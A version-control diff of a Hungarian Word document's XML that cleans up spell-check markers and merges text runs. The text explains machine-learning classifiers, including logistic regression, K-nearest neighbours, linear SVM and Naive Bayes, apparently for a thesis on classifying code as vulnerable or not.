           <w:lang w:val="hu-HU"/>
@@ -8869,14 +7851,12 @@
         </w:rPr>
         <w:t>(</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>unsupervised</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -8895,14 +7875,12 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>reinforcement</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -9227,21 +8205,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>„</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>train</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>”</w:t>
+        <w:t>„train”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -9265,21 +8229,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>. A címkézett adatok (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>train</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t>. A címkézett adatok (train)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10166,21 +9116,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> osztályozás (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>classification</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>) és</w:t>
+        <w:t xml:space="preserve"> osztályozás (classification) és</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10192,21 +9128,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> regresszió (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>regression</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
+        <w:t xml:space="preserve"> regresszió (regression). Míg az osztályozás célja, hogy megjósolja azt a kategóriát, amelyhez az adatok tartoznak, addig a regresszió számértéket jósol a korábban megfigyelt adatok alapján. Ez egy példán keresztül könnyedén megérthető: az osztályozás a „Holnap meleg lesz vagy hideg?” kérdésre </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10324,48 +9246,20 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>independent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> (independent variables)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>variables</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -10394,35 +9288,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>dependent</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>variable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>)</w:t>
+        <w:t xml:space="preserve"> (dependent variable)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10458,7 +9324,6 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="15" w:name="_Toc71471971"/>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -10468,34 +9333,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Logistic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Regression</w:t>
+        <w:t>Logistic Regression</w:t>
       </w:r>
       <w:bookmarkEnd w:id="15"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -10627,28 +9467,84 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Logistic</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Logistic Regression</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Regression</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>ennek egy speciális esete</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>mivel</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> csak</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> bináris kimenet előrejelzésére</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> alkalmas</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>, azaz a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">z osztály </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">adott értelmezéssel ellátva (sérülékeny, nem sérülékeny) 0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>vagy</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 1 lehet.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -10659,78 +9555,6 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ennek egy speciális esete</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>mivel</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> csak</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> bináris kimenet előrejelzésére</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> alkalmas</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>, azaz a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">z osztály </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">adott értelmezéssel ellátva (sérülékeny, nem sérülékeny) 0 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>vagy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 1 lehet.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t xml:space="preserve">Alapja </w:t>
       </w:r>
       <w:r>
@@ -10739,28 +9563,12 @@
         </w:rPr>
         <w:t xml:space="preserve">a </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Linear</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Regression</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Linear Regression</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11310,21 +10118,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">logisztikai </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>szigmoid</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> függvény</w:t>
+        <w:t>logisztikai szigmoid függvény</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -11500,45 +10294,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>K-</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Nearest</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Neighbors</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>K-Nearest Neighbors</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12094,14 +10851,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A távolság megtalálásának leggyakoribb módja az </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>euklid</w:t>
+        <w:t>A távolság megtalálásának leggyakoribb módja az euklid</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12113,14 +10863,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>szi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> távolság</w:t>
+        <w:t>szi távolság</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12567,21 +11310,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">n-dimenziós </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>euklidészi</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> távolság képlete</w:t>
+        <w:t>n-dimenziós euklidészi távolság képlete</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12620,7 +11349,6 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="17" w:name="_Toc71471973"/>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12641,9 +11369,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>ear</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">ear </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12653,9 +11380,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Support Vector</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12665,9 +11391,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Support</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12677,9 +11402,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12689,9 +11413,8 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Vector</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>LinearSVC</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12701,41 +11424,6 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>LinearSVC</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
         <w:t>)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="17"/>
@@ -12766,99 +11454,74 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">z </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>S</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>upport</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>z S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">upport </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>V</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ector </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>achine</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>V</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>ector</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(SVM) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>döntési határokat meghatározó döntési síkok koncepcióján alapul.</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>achine</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(SVM) </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">a </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>döntési határokat meghatározó döntési síkok koncepcióján alapul.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -12877,7 +11540,6 @@
         </w:rPr>
         <w:t>C</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -12900,21 +11562,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>hyperplane</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">) </w:t>
+        <w:t xml:space="preserve">(hyperplane) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13760,7 +12408,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Gaussian </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13770,34 +12417,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Naive</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i w:val="0"/>
-          <w:iCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
+        <w:t>Naive Bayes</w:t>
       </w:r>
       <w:bookmarkEnd w:id="18"/>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13819,21 +12441,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">A Naiv </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
+        <w:t>A Naiv Bayes a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13845,21 +12453,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> csoportja, amely a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-tételen alapul</w:t>
+        <w:t xml:space="preserve"> csoportja, amely a Bayes-tételen alapul</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13883,21 +12477,7 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
